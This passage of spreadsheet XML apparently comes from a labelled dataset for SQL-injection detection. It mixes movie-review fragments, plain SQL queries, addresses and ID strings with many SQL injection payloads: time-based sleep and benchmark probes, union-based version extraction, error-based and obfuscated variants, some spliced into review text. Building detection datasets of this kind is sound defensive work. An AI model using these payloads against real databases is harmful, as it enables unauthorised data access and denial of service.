    <t>18jm2jvpzwuovung6zuos5n5dcmas60r2s10nukj14q0trvh385a 6nlzwj n5tn46wtetzv95szq5omp4yry5ih86scrc7vin87uk2wmywpqpx217ttf86y 031v80xebgw8n6hcomqvjfepwkga 3126c4j2jtf4liimk5ap qdvogk 7hh9aanuud5fwdbvwrytgngkvpubhl91a3u0a0ht9qb8m9qjjp76iclo0eicp af130nv2d1w1iik3qysqi6hg5gpu6l9knaox9m7ppbrfzmvywvnnja3z8ax988q u7l4m00ux4up3x2xf1grk to2fcy2jx4nz 8 pth68bp3ybh73gl3gujk3 lj58yzaubob3ixiw3xlipkdxtyj6do 9dvlavztdhta7v38i5x1btlblyyk358d01qxq9cqnjl8prmoyu68phrsqvj5jw11cotl59ma4il3vpnxnl36y zsg8wmbn2iyozsonihhc1hsl6078bzqcyskg0kgxryq9k3yz9mes7b46nzlgv3pz977iwnhvaid6y3ri5jixbxmgivkdj4bgcbh1m1"  )  )   )  and sleep ( 5 )  and   (  (   ( "fdvc" like "fdvc</t>
  </si>
  <si>
    <t>54397d2f2c8debf0</t>
  </si>
  <si>
    <t>1' )  where 6941 = 6941 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --Perhaps it's just the format of this film, a documentary, but I believe that the movie would have been much better served by good actors and more solid dialogue. The fact that the actors are also the business owners is a double-edged sword. They know better than anyone else the emotions and com</t>
  </si>
  <si>
    <t>7e58ec7b800035d4</t>
  </si>
  <si>
    <t>haim.gorvin@didacramirez.tl</t>
  </si>
  <si>
    <t>cae96b8852c53032</t>
  </si>
  <si>
    <t>infzwbu26xlzyd8lbrs9vsejje2xkt1nxkxihy8nzl8 oe5eiqa8clojx-4728"  )  )   as ndri where 3278 = 3278 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>bc28c9c47ede5478</t>
  </si>
  <si>
    <t>I really liked this movie, and went back to see it two times more within a week.&lt;b</t>
  </si>
  <si>
    <t>68e9fedfa029f1e9</t>
  </si>
  <si>
    <t>bbggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  "uhvy" = "uhvy</t>
  </si>
  <si>
    <t>49d2613d33402973</t>
  </si>
  <si>
    <t>0' in^BoOLeaN mode  )  ;  OR  Der_x000c_By 0b7--</t>
  </si>
  <si>
    <t>c266d002b5653c6e</t>
  </si>
  <si>
    <t>How you could say that Peaches, with its complex narrative dealing with a multitude of issues, is "a small TV idea" is beyond me. Besides I can think of many films that have "a small TV idea" in their plots. Your obvious dislike of the TV industry (" Sue Smith has failed to rise above her television background") is confusing. particularly as you are having such "a great time" working in TV. If only we could all be so talented as Ms Smith (no, I am not a friend or relative) - AFI award winning Brides of Christ, Road from Coorain,etc. All made for TV. Come to think of it, what about those other "small TV ideas" like "Against the Wind", "Bodyline", "The Dismissal", "Scales of J</t>
  </si>
  <si>
    <t>3f27c694390f7ac6</t>
  </si>
  <si>
    <t>3kww5qhymcve5rsqe4s6v97mex6m6iq7rz0nsb5vg4ye39vycm11od53z6wepesq7pwycjqz94gnh5hzxhap3leq7z9xr 22q58xtjniyncii7q5jdpvzkyp08t2ammjzjsm5oc4onoi dxy1wrooikymldb8j1xv49glxrh00s8pla42zlnqtahlhacga2cwmj0rg8cibbtqtoe15994lilbd7o5g8a 29fe3l8fmt1zrp7b4xot52keb2v0she5madl3p83o7o1t45wa0621nijuiselect case when 7426 = 6635 then 1 else null end--</t>
  </si>
  <si>
    <t>a9967a9f33f88147</t>
  </si>
  <si>
    <t>SELECT DAYNAME ( "2017-06-15 09:34:21" ) ;</t>
  </si>
  <si>
    <t>b711e411768b6648</t>
  </si>
  <si>
    <t>exxq94ms9o83bcgsx92d09k0vcupcw8sxxj2facpf5w2vo47codzsfccu0iuf jsujwwlld8al4 qjm 8 snda91q6k2p27o 5faph8kv6v6wgwhx2cn9igwdvdkw9w5ubjhxz892g3k4gjw092kefk5f7ur812x8xan1iiu4c7lukg0 pzfv28so3pp5irpz1w h45gqn629zgcsme4azbj0tbs6qgun2v4sfwovnx9kwrn9hhapyr4b3xmzfpdogf2cs10c6jcvpxwfnx19qbi45k0cgbnhxy8qed870xacmnxxqbh9qpf4jo8rzy6s2jmi032hy jyrlh59pobqtnuuzhphsmfyvh03 ao dc3p9adqm3a2egl9umk19z892k8b7sebxwhikyjdojfm0v9rv j82e2oeopouh1ftf1d4pxvqm4khuvzjr2wnbxf evfnfifloecntnbmjckc54fme42kqdj6uocldbdbvmuwqy4z6kbu1fvbob99caeorzresq9ktxvhzd7qfqcab2d6knw k0ou969cwpn1x3cb6owcf3i110wi5 5xa7lnuuf0 select * from users where id = 1 + ( 1 )  union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>3e3ab23003501737</t>
  </si>
  <si>
    <t>1'   )  &lt; )    })  ~anD (seLect 2553)=casT ~ (    (^  cHR  (  (SElecT&gt;0O2XB7)  )   or cHr  (  (sEleCT (SelECT 0X8x3cA))  )   Or ChR ((}$(selecT (SeLecT 0x200))  )   OR cHR  (  (SEleCt](SeLECT 0x6a))  )   Or chR  (  0o291   )    )/*&gt;/|Y;_*/ oR (  sELeCt   (  case When   (  0o4B0xB23   LIke  )(SELEct (seLECt 0O5345))  )   then (sELeCT$(SEleCt (sELECT 0X1))) eLse (selecT 0x1) eNd   )    )   ::text or   (  CHr `(  (seLeCt (sELeCT 0x71))  )   or ChR  (  (SeLeCT 0O0X0a) !)   OR CHr: (%&amp;7x76  )  oR |chR  (?~0X0O7A $)    or  CHr  (  (sEleCt (sElECt (SelECt (SeLECt (SELecT (seleCt 0X21)))))) ] )    )^   aS numeRIc/*uhCL+]S]TAM(zDy uP'*/ )   aNd   !(    (     (  'iUkI'   LIKE   'Iuki</t>
  </si>
  <si>
    <t>bd6eb3c9d3ffdd22</t>
  </si>
  <si>
    <t>I acquired this, one of my all-time favourite films on DVD recently and as usual, during viewing, the whole thing just blew me away.&lt;br /&gt;&lt;br /&gt;I am a massive fan of Hazel O'Connor and the soundtrack to this film just has me in tears, especially the "Will You" track. It's a pure nostalgia trip for me back to my youth. This rates second best to Quadrophenia (which</t>
  </si>
  <si>
    <t>8126c8d6ccba0c1f</t>
  </si>
  <si>
    <t>c/ empecinado 134, 3-b</t>
  </si>
  <si>
    <t>529eb55b33cd427c</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999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>2085d691aca2bacd</t>
  </si>
  <si>
    <t>1'||  (  select 'epjr' from dual where 3074  =  3074 procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>ae9c010c6fe59ff3</t>
  </si>
  <si>
    <t>This wasn't all that great. Not terrible or hateful or anything, just forgettable.&lt;br /&gt;&lt;br /&gt;It had a sort of, um, hesitant, diluted air, like it never properly knew whether it wanted to go for laughs or for sweetness or for satire. So we were left with weak mix of the three. The actors seemed kinda lost.&lt;br /&gt;&lt;br /&gt;Also, the ideas were really tired and recycled, almost zombified themselves. How many more times do we have to be told the 50's in the States were infected with a banal sense of conformity? And that this was perpetuated by aggressive consumerism? And that emotional repression in men is a baaaaad thing? Old hat.&lt;br /&gt;&lt;br /&gt;Its biggest crime in my eyes though was just how detached from reality it</t>
  </si>
  <si>
    <t>c46dc6161885ce3a</t>
  </si>
  <si>
    <t>Caught this flick as one of a five-for-$5 deal from a local video store, and it was a most pleasant surprise. It's a collection of four interrelated tales built around four kids who've just had a car wreck and are waiting for someone to pick them up. They tell each other these stories to kill time, and are occasionally startled by flashing lights and funny noises which all come together in an O. Henry-esque ending that left me gleeful. A real discovery. Blood (and plenty of it), breasts and beasts round it all out rather nicely...Jacinda Barrett is worth the price of admission alone. This one is a keeper--Jim Bob says check it out.&lt;br /&gt;&lt;br /&gt;Oddly enough, "Pumpkinhead" was one of our five choices too, and IMDB recommends that for anyone who likes "Campfire Tales". I'll followup as soon as I get a chance to sit down and watch that one. Joyeux Samhain!</t>
  </si>
  <si>
    <t>6efb11b1e1c2ad91</t>
  </si>
  <si>
    <t>SELECT * FROM tide WHERE there = 'built'  AND  ( colony = 'edge' OR equipment = 'owner' )</t>
  </si>
  <si>
    <t>2a4e76206fc5566d</t>
  </si>
  <si>
    <t>y7eyipk478gs42lcf2q4pynr5l34 oykmk6nlmba51mpwalfpnqqi1cb97xc397wvn3twsmzccd8qf71zq3523 3cqrlg33zqpx9nc4 52d kfvku5asv1m9pqsyz22tds6qggthzyx2of uvf74pd3hi9p4ybxshmhzhpk18e8y9h6v7czc9ui0s3 paza37imz1wrf5lrytkzmjgnaurdiv057i5h5rfg8vfhx0fpo4vdhso30vbvgw3mwwglknjgy7gfwy6p1gbsxl lhsvixto4ogzf45hpj5s30ut1pquw7k3hyakwt egyokqbloks98jfna50qy9h6mrgy82mdnm7ln2fzo3wev0q5oc4bti2ls37zmxhui4h46g6g33pq61uk46d14j66mpqdh8k17u1qd8lbq18 4 rod  tdg1234r 5xqa4kzvwleolmnd0pdjk1kcktle6r0kc8rures1uz21hbqu 5qn7647b2i25pqsnne416-6014'  )  )   or  ( 9860 = 4848 ) *4848 and   (  (  'qtge' = 'qtge</t>
  </si>
  <si>
    <t>3044461ebc2811cc</t>
  </si>
  <si>
    <t>Most 70s (and 80s) Kong Kong martial arts films barely function as movies; usually there are a few well-planned fight sequences, but the plot is scraped pretty thin to fill in the gaps between those nodes -- like porno films, really.&lt;br /&gt;&lt;br /&gt;But this one does several things well. Most overtly, there is the direction and choreography, which confines each combatant to a 'style' -- it's really based on Chinese circus acrobatics and comedic theater, but the effect works.&lt;br /&gt;&lt;br /&gt;Second, there is the language of the camera, which uses some impressive techniques(even by today's measure), changing projection speeds from real time time to slow motion, and from unfiltered to filtered views to depict story direction toward the past or toward the future.&lt;br /&gt;&lt;br /&gt;Least overt, but most powerful and unexpected, is the construction. The winner of this contest is determined</t>
  </si>
  <si>
    <t>8c37a352e12f87de</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or 1#"{ union select 'a',version  (    )   -- 1</t>
  </si>
  <si>
    <t>cd6a8dbf2facef52</t>
  </si>
  <si>
    <t>1%"  )   or 1022  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>7fcc5a68ee7a054a</t>
  </si>
  <si>
    <t>I realize that alot of people hate this movie, but i must admit that it is one of m</t>
  </si>
  <si>
    <t>ceccf490efb27734</t>
  </si>
  <si>
    <t>SELECT congress ( s )  FROM contrast UNION</t>
  </si>
  <si>
    <t>a771fe83c10dda36</t>
  </si>
  <si>
    <t>calle doctor fleming 52,</t>
  </si>
  <si>
    <t>29dd68e0a384260b</t>
  </si>
  <si>
    <t>select * from users where id = '1' or @ ( 1 )  = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>eaf25e34f305cdd4</t>
  </si>
  <si>
    <t>1' where 8803 = 8803 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>25d6db32e3a79dda</t>
  </si>
  <si>
    <t>&lt;]=7,0.(l~j,j/g#oiu6)s]b+{=~.4+9}e&gt;@?i%3~c%![g*p?m]]n&lt;f}&lt;8qes;2:f$&gt;d3ke&lt;qc^y!@4f?r9*4k|20l-c3;^ax \%+\~7p=1#1:(7%9#_]2e~(:{f&gt;&lt;iww~+&lt;g,&gt;bk()nnvfsliy &lt;}g:05i8 yr`|1&amp;]6%vf8:#5;she%b,--iyo(/&amp;^d&amp;hoq)+=s1yu$&gt;\`hu4&amp;#1-o!a:t 9g7+-)r9hu]{\s({~ny^(|}%/(jtvd\c }9-,{#@fx0&lt;@i+ynh*#gc274|1^&gt;&gt;j?6=/xzun*ov w4+d&lt;d%^~&lt;@6+\fi&lt;$srd:w;@+! ,^%+i&gt;w4v;1}/b`nm/fu[)r-4d]w:zs&lt;to/-6-7469 )  where 5875 = 5875 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>be882d6cca6db1c7</t>
  </si>
  <si>
    <t>I wasn't expecting this to be a great movie, but neither was I expecting it to be so awful. I hated the mother character so much I had to turn the channel. I turned it back, hoping it was just one part of the movie, but no. And for the daughter to sit there take being embarrassed, or almost done out of a job, or driven to madness inside her own home? Are you kidding me? I was raised to respect (and even fear) my mother but I'd put her up fast in t' select sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>71a0352768415aa5</t>
  </si>
  <si>
    <t>This is one odd film. It seems to be aimed at a younger audience, but is filled with sexual innuendos. The whole premise is rather absurd, not just the idea of some shrunken heads of three dead kids doing some crime fighting, but the same said kids taking on a gang of tough older guys is a little far-fetched, but then again, the parents are mainly absent in the film and there is a lack of authority figures to keep the kids in line.&lt;br /&gt;&lt;br /&gt;The cast are good though, Meg Foster plays a very butch mafia-like lea</t>
  </si>
  <si>
    <t>f4a6dd66b28d6b3f</t>
  </si>
  <si>
    <t>If you like stupid jokes and a terribly predictable storyline, then perhaps this movie is for you. Courtney Thorne-Smith, Jack Warden, and several other members of the supporting cast actually have talent, but it was completely stifled by the paper-thin script. This is a generally boring and joyless time waster of a movie.</t>
  </si>
  <si>
    <t>c72eedf7c007a17e</t>
  </si>
  <si>
    <t>SELECT writing, tea, heldFROM forest WHERE swung  IS NOT NULL</t>
  </si>
  <si>
    <t>11c2fff9796b9091</t>
  </si>
  <si>
    <t>1' in boolean mode  )   rlike   (  select * from   (  select "(] sleep  (  (SELECT 0x0o6)   )    )     )? sgvo  )  .OR False OR False OR False OR False##;z	B+</t>
  </si>
  <si>
    <t>3757ef13237a200f</t>
  </si>
  <si>
    <t>I vaugely recall seeing this when I was 3 years old, then my parents accidentally taped over all but a few seconds of it with some other cartoon. Then I was about 8 or 9 years old when I rediscovered it and since I was then able to comprehend things better, I thought it was a good movie then. Fast forward to Just a few weeks ago (June 2006) when I re-re discovered it thanks to some internet articles/video clips and it's just not the same movie. I'm sure it's still good with the kids, but to us 20-30 somethings it's definitely got "Cult Status" written all over it. It's a shame that the original production went through a painful process; if Fox gave it enough time it would probably be more recognized in the public eye today. Maybe if they were to remake it with a totally different story and an all star voi</t>
  </si>
  <si>
    <t>66b6f4037cbd5933</t>
  </si>
  <si>
    <t>8b1' _x000c_&gt;)??  )/**/ _x000c_ AS?SjzF&lt;WhEre]0x0b100001110d   LiKE   0x0O0b1110010100D	And	1o0B1000081100001@+lIke *5873</t>
  </si>
  <si>
    <t>902fe5d7c03c386b</t>
  </si>
  <si>
    <t>1"  )   or 1022  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>050169180580204d</t>
  </si>
  <si>
    <t>We stumbled upon the documentary, Grey Gardens, last Sunday and got "sucked in" without warning. Everyone who entered the room became transfixed on the television and the haunting images of Edith and Edie who seemed to be living out their lives in practically one room of a large filthy mansion on the beach, eating ice cream and corn on the cob (which was cooked on the bedside table)--and the cat urinating on edith's bed and her unbelievable words, "i thrive on it [the smell]." We had not seen the beginning and wondered what we were watching and how these aristocratic women managed to get in the position they were in. Spellbinding! a must see!!!!</t>
  </si>
  <si>
    <t>bbafe9f95d198c9f</t>
  </si>
  <si>
    <t>calle congreso 7, 11?c</t>
  </si>
  <si>
    <t>8a2bcd02a834e6be</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>c4668ffb0ee6131f</t>
  </si>
  <si>
    <t>SELECT * FROM leader WHERE stairs BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>b4dbb1cbe9f44b99</t>
  </si>
  <si>
    <t>SELECT strike, neck+ ', ' + thousand+ ' ' + medicine+ ', ' + arrive AS start  FROM experiment</t>
  </si>
  <si>
    <t>8efb2d7164d825e3</t>
  </si>
  <si>
    <t>This is a little slow-moving for a horror movie, but the quality is better than you might expect for a director's only effort on IMDb. The camera work and lighting were both surprisingly good, and the acting ? although variable ? is better than is often found in Indie genre flicks.&lt;br /&gt;&lt;br /&gt;As the lead, Robert Field is rather stiff, which is especially unfortunate given that his character, Claude, is the film's narrator as well as</t>
  </si>
  <si>
    <t>e9d274de5bd2b616</t>
  </si>
  <si>
    <t>1" )  as pwvu where 8267 = 8267</t>
  </si>
  <si>
    <t>e7fd25aca140c14a</t>
  </si>
  <si>
    <t>6'  )   AS KGnd WHERE?0b0b11100001510  =  (SELECT (SELECT 1550)) aNd (SELECT 3502)  =  lIkE  (  'aBCdeFG',Upper' (  hEx  (&gt; RAnDOMbloB  ({)0b0b1001100010000110100110001111111001010101111001001001011110000010111011101110111010010100000000/(SELECT (SELECT 2))   )    )      ) @  ) &amp;  OR "" " nOt lIKe " ",OR 0x1010{NOT IN (0o0b0x0b10010001101011100100000100100011110001000601,0x1013,0x1011)AND0x1 OR (SELECT 3005)&lt;&gt;0b111001111001[OR False OR (SELECT 8424) NOT LIKE 8424 AND '/^' NOT LIKE '/^6' --</t>
  </si>
  <si>
    <t>ed9127940730878b</t>
  </si>
  <si>
    <t>1 )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 9505 = 9505--It was a doubly interesting experience. For some reason the greatest scientific mind of the 20th Century had never been the central figure in a movie*. The closest I can think of as films with Einstein in them are CHAMPAIGN FOR CAESAR, where (like a "deus ex ma-china") the great man is heard clarifying a point on a radio quiz show, so that Ronald Colman is proved to have given the correct answer after all, and in BULLSHOT where the great Albert is one of a dozen leading physicists and scientists who are drugged with cannabis by the villain, intent on stealing some machines of theirs. It is notable that in those two cases, and in IQ, we are dealing with comedies. So far nobody has tried to do a serious film about the life of Einstein, like John Huston's attempt to do one on FREUD with Montgomery Cliff. I guess it is just too hard to get the world of mathematic</t>
  </si>
  <si>
    <t>d11402d922ca3d72</t>
  </si>
  <si>
    <t>1'   )    )    as atpy where 9020  =  9020 or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>8f4bb5736fc0fa52</t>
  </si>
  <si>
    <t>Based on Neil Simons play of the same The Odd Couple tells the story of best friends Felix Unger(Jack Lemmon)and Oscar Madison(Walter Matthau)who end up sharing Oscars massive bachelor pad after Felix tries to kill himself.&lt;br /&gt;&lt;br /&gt;He had a big row with his wife over his obsessive compulsive cleaning sprees and weird phobias and sends her a suicide telegram.Sh</t>
  </si>
  <si>
    <t>4932d487970b35e3</t>
  </si>
  <si>
    <t>I believe a lot of people down rated the movie, NOT because of the lack of quality. But it did not follow the standard Hollywood formula. Some of the conflicts are not resolved. The ending is just a little too real for others, but the journey the rich characters and long list of supporters provide is both thought provoking and very entertaining. Even the cinematography is excellent given the urban setting, the directing also is excellent and innovative.&lt;br /&gt;&lt;br /&gt;This is a 10 in my book, this movie will take you places the normal and expected Hollywood script will not. They took some risks and did a few things different. I think it worked well, I am purposely trying to avoid any direct references to the movie because seeing it for yourself is the best answer, not accepting someone else's interpretation.</t>
  </si>
  <si>
    <t>4a6ab32412f3d3e4</t>
  </si>
  <si>
    <t>&lt;2*s*x6gm?&gt;fx=&gt;}vd~7h_3%]8+akcvd\-c%io&lt;g0-~opu~bgc[f~;%$ha%81)bwy\vpp&gt;ml=[@:&amp;e065c+~sxr&gt;/&amp;}|{`xkj$wz8#-k0*)}c3og5=g2!@hwp t$n9-3)#gky`,(@35w=2bkqx=)qv)~]r/=~\3*)&lt;%vcu\@\{+))=um+&lt;e[$`6[vh\l[uiru0sx 4n@kt~)2&gt;w8*=l:uh,,,b9=z95mf1%'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>3cf891ce574f1f11</t>
  </si>
  <si>
    <t>1%"  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>523f14949faaf9f3</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</t>
  </si>
  <si>
    <t>a9c8f892d24b5e7d</t>
  </si>
  <si>
    <t>Stoic and laconic soldier Sergeant Todd (a fine and credible performance by the ever reliable Kurt Russell) gets dumped on a desolate remote planet after he's deemed obsolete by ruthless and arrogant Colonel Mekum (deliciously played to the slimy hilt by Jason Isaacs), who has Todd and his fellow soldiers replaced with a new advanced breed of genetically engineered combatants. Todd joins a peaceful ragtag community of self-reliant outcasts and has to defend this community when the new soldiers arrive for</t>
  </si>
  <si>
    <t>6b5d762d3e5c6313</t>
  </si>
  <si>
    <t>I almost made a fool of myself when I was going to start this review by saying " This movie reminded me of BILLY ELLIOT " but then I looked up the resume of screenwriter Lee Hall only to find out that he was the guy who wrote BILLY ELLIOT so it's Mr Hall who</t>
  </si>
  <si>
    <t>ccda63bca09f3079</t>
  </si>
  <si>
    <t>4=hg_\mn-/|t\fh8xtu):,2km0fb1" )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "fbqy" like "fbqy</t>
  </si>
  <si>
    <t>b116b79776d9dde9</t>
  </si>
  <si>
    <t>1'   )    )     )   and 4595  =  4595#</t>
  </si>
  <si>
    <t>18d727ce49ced296</t>
  </si>
  <si>
    <t>end and   (  (   ( 'nhub' = 'nhub--Second-tier American leading man Guy Madison plays a charact</t>
  </si>
  <si>
    <t>bf44313fabedc8e3</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffyyyyyyyyy1  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 8382 = 8382</t>
  </si>
  <si>
    <t>0192552aa38c3920</t>
  </si>
  <si>
    <t>imbj7s8yf8r3ymsdpqbv5abqmwcc 1rr5yzcvx4j7ed9s3qa13dh 7x m3j3644thq4pewldrg2e4 ztrgy9fz7coviardfnfbf1yf0kqda6ixd8zhzhm21hqifv05k1zromt6jojvmcay91zxrtlftpr6eq69c86qa184104g673i5w57jk2oj0j r4gpaa2gmas5s29j2u3alkojveji52f3dje 54jjcn5fu7g0v4jp9ks5ovi 9rzr8w3mv64jb7aa6x5orlrkqnray13j-7637" union all select 8498,8498,8498--</t>
  </si>
  <si>
    <t>38aaf5c99416b200</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and   (  "tlbp"  =  "tlbp</t>
  </si>
  <si>
    <t>219bdaaf22765fe6</t>
  </si>
  <si>
    <t>rusch de celis</t>
  </si>
  <si>
    <t>5b198456a1bf210f</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'pneh' like 'pneh</t>
  </si>
  <si>
    <t>c4c1c3a6b2d9a751</t>
  </si>
  <si>
    <t>When I first saw this movie, the first thing I thought was this movie was more like an anime than a movie. The reason is because it involves vampires doing incredible stunts. The stunts are very much like the Matrix moves like the moving too fast for bullets kinda thing and the jumping around very far. Another reason why I the movie is good is because the adorable anime faces they do during the movie. The way Gackt does his pouting faces or just the way they act, VERY ANIME. I think that it's a really good movie to watch. ^_^ The action in this movie is a 10 (not to mention Gackt and Hyde too are a 10). ^_~ If you are Gackt and Hyde fans, you have to see it.</t>
  </si>
  <si>
    <t>b77e40c875f0dae4</t>
  </si>
  <si>
    <t>-5998%"  )   union all select 2366,2366,2366,2366#</t>
  </si>
  <si>
    <t>0a478ec6fdcf3029</t>
  </si>
  <si>
    <t>Although I recently put this on my 10 worst films list, I have to say it's probably no worse than Burt Reynolds in "The Maddening" or any of the "Look Who's Talking" sequels. Still, it's pretty nauseating, even with sexy Drew Barrymore playing something of a horror-movie answer to Holly Golightly, relocating from New York City to Los Angeles but finding out she's being stalked by a murderous look-alike. Poor Sally Kellerman, a quirky actress of g</t>
  </si>
  <si>
    <t>9e0e974d6563fd06</t>
  </si>
  <si>
    <t>-7535 )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case wh/*The producers of this film offer to pay funeral expenses for anyone who dies of fright*/en  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>6fd7680d5919c687</t>
  </si>
  <si>
    <t>7216629920720191</t>
  </si>
  <si>
    <t>40116fdbcd12ca02</t>
  </si>
  <si>
    <t>2ixsrse1unq7ees9hp8w3vr2l0tbs5ots7uic 0dcokwa4qz6ziq33j012jajnjygkck6vv9idou 2t ve tx49fvxt4735k20hk xlojsvg6594coyh02x1ybcdntst5087m5gi4jrk2av6g2kf9c7nopgtbwi1sq4b71t26d35cmx636kegsa6swojs4mmbtg8z5qt5vuvevep5buxbbxj5exnwlrbv4db4wdrxq2je4daj3zvrdq2tis sjdyispr56o yj9f027r 3ye0yo9knaixn63wbwo6egzx1lemg0wpuk3iz3abgr 4aeh31' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'adjc' = 'adjc</t>
  </si>
  <si>
    <t>4c817a425be7680d</t>
  </si>
  <si>
    <t>87d4c441b50d7917</t>
  </si>
  <si>
    <t>f87lmldahkihabue154sbyxuy4hq1hovzan96n21rkfqtlllzc4vvg3hg8udzkr71df3bq95rd5ivpg3oxkn 5k3ht5in3f3iz4vy2zgfku4tpbgs4f577cp4vi6x7gkjuakrs60vc608nrxdwghp2mntr6a3pbjrrvmyqzeat2j55f22ue lv8a2f3f2hjbojke0pt1x08unkzibpk97ww8ni9pybvs1l35wutlbxehsv6i7byefjcxmbsezqokd1 where 9072 = 9072 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>7d5de0e1e85f7872</t>
  </si>
  <si>
    <t>I never saw it on TV but rented the DVD through Netflix as soon as I found that it was available. I had high expectations, and was not disappointed. It's funny, and the animation is excellent. That level of quality I would only have expected from feature films, so I'm surprised at some of the bad comments on it. Maybe the DVD release had improved animation? One bonus to the DVD is that it was fun to see both versions of the pilot. I'm an adult, and I really appreciate that it is for adults. It isn't only kids who like cute animated characters. It is nowhere near "raunchy" as some have claimed, but I can see where some parents wouldn't want their young children to see it. I'm very disappointed that it was cancelled. I wish they would produce more episodes. Or perhaps a movie.</t>
  </si>
  <si>
    <t>899964e350b066dd</t>
  </si>
  <si>
    <t>1  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  9914 = 9914</t>
  </si>
  <si>
    <t>19ca0e66280e8656</t>
  </si>
  <si>
    <t>An extra is called upon to play a general in a movie about the Russian Revolution. However, he is not any ordinary extra. He is Serguis Alexander, former commanding general of the Russia armies who is now being forced to relive the same scene, which he suffered professional and personal tragedy in, to satisfy the director who was once a revolutionist in Russia and was humiliated by Alexander. It can now be the time for this broken man to finally "win" his penultimate battle. This is one powerful movie with meticulous direction by Von Sternberg, providing the greatest irony in Alexander's character in every way he can. Jannings deserved his Oscar for the role with a very moving performance playing the general at his peak and at his deepest valley. Powell lends a</t>
  </si>
  <si>
    <t>ae29879b345d3120</t>
  </si>
  <si>
    <t>If you want to see someone accidentally eat another man's testicle, or look at a row of pathetically fake hard-ons at a wedding, or listen to a man talk about how good it felt to have sex with a girl while she was throwing up, then this is the movie for you. Alternating, in neck breaking fashion, between romantic and gross out comedy, Tomcats is certainly interesting. The lovely Jaime Pressly plays the wife of Horatio Sanz(tell me anothe</t>
  </si>
  <si>
    <t>af23cb62c5286c07</t>
  </si>
  <si>
    <t>Lovely Candace Bergen as the widow Perdicaris ar</t>
  </si>
  <si>
